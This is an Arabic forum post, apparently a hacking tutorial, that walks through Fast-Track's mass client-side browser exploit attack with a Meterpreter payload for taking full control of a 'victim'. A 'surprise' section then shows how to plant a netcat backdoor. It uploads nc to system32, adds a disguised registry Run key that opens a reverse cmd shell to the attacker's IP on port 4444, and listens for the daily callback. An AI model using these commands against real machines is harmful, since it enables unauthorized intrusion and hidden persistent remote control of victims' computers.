حصريا : و الاختراق بجميع ثغرات المتصفح .. + مفاجئة Fast-track
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته ..
وشلونكم ؟
ندخل في صلب الموضوع ..
طبعا المكتوب واضح من عنوانه ..
راح نستخدم اداة الفاست تراك في تطبيق هجوم الـ Client-side
طيب يا عامر وش يعني ؟
باختصار شديد .. هو تجميع اكبر عدد ممكن من الاكسبلويتات الموجودة بالميتاسبلويت في وقت واحد و في ايفريم واحد على سيرفر محلي ..
طيب ندخل على التيرمنال .. بوضعية الجذر
و نكتب الامر لدخول مجلد الفاست تراك
كود:
cd/pentest/exploits/fasttrack
لو تستعرض الملفات الموجودة بالمجلد .. بتلقى سكربت الفاست تراك بلغة البايثون ..
طيب نشغله بالامر ..
كود:
./fast-track.py -i
-i تعني تشغيل السكربت داخل التيرمنال ..
الان بيطلع لنا عدة خيارات ممكن تنفذها .. و كل مهمة لها رقم محدد
هجومنا المطلوب اسمه Mass Client-Side Attack و رقمه 4 .. يعني نحدده بالرقم 4
من ثم بيطلب منك السكربت وضع الاي بي اللي راح يكون سيرفر للتنصت عليه ( الاي بي تبعك طبعا )
من ثم بيعرض لك 4 بايلودات تختار منها اللي تبي .. يفضل Meterpreter لان راح نستخدمه بعد شوي لسهولته ..
ثم بيسالك اذا تبي تعمل ارب بويزنينج اطلب منه لا ..
الان الاداة تقوم بعملها و تجميع الثغرات الممكن و بدأ السيرفر ..
ننتظر الى ان تنتهي .. بكملة Server started
بامكانك عمل سبوفينج بالسيرفر .. ( شارحها في مواضيع سابقة بالتفصيل )
عموما .. الان نفرض لقطنا الضحية بيخبرك ان فيه جلسة جديدة مفتوحة ..
ندخل لها بالامر
كود:
sessions -i 1
1 يعني رقم الجلسة ..
الان امامك الضحية .. و يمكنك تتحكم فيه تحكم كامل
================================================== =========
دور المفاجئة :-
المفاجئة يا طويل العمر هي استخدام النت كات كـ Backdoor يتم حقنه بالرجيستري ليتنصت على الاي بي تبعنا داخل مجلد بدء التشغيل ..
اولا: نرفع النت كات الى على هالمسار داخل جهاز الضحية ..
كود:
upload /tmp/nc***** C:\\windows\\system32\\nc*****
الان ندخل على موجه الاوامر تبع الضحية ..
كود:
execute -c -H -f cmd***** -i
وش السواة الحين ؟
امر بسيط لحقن مفتاح ريجيستري بهالقيمة .. nc -d -e cmd***** 192.168.1.3 4444
مع التغيير للاي بي تبعك .. و المقصود بهالامر تنفيذ التنصت خلال بداية التشغيل بوضعية موجه الاوامر ..
و هذا هو الامر كامل
كود:
reg add hklm\software\microsoft\windows\currentversion\run systemfile /t reg_sz /d "nc -d -e cmd***** 192.168.1.3 4444"/
reg add : واضح .. امر بدائي لاضافة اي مفتاح
hklm : و تعني مجلد HKEY_LOCAL_MACHINE
/v : و تعني اسم المفتاح و انا هنا موهت بالاسم systemfile
/t : و تعني نوع المفتاح و في الاغلب يكون reg_sz
/d : و هنا تتلخص الزبدة تبعنا .. و هي البيانات المطلوبة و هذي بيناتنا n c -d -e cmd***** 192.168.1.3 4444
الان و بعد زرع المفتاح ..
نروح للتيرمنال و ونتنصت على البورت 4444 ..
كود:
nc -vlp 4444
و الضحية راح يشبك معك يوميا ..
اي استفسارات انا موجود .. بالخدمة
رد مع اقتباس
رد: حصريا : و الاختراق بجميع ثغرات المتصفح .. + مفاجئة Fast-track
المفضلات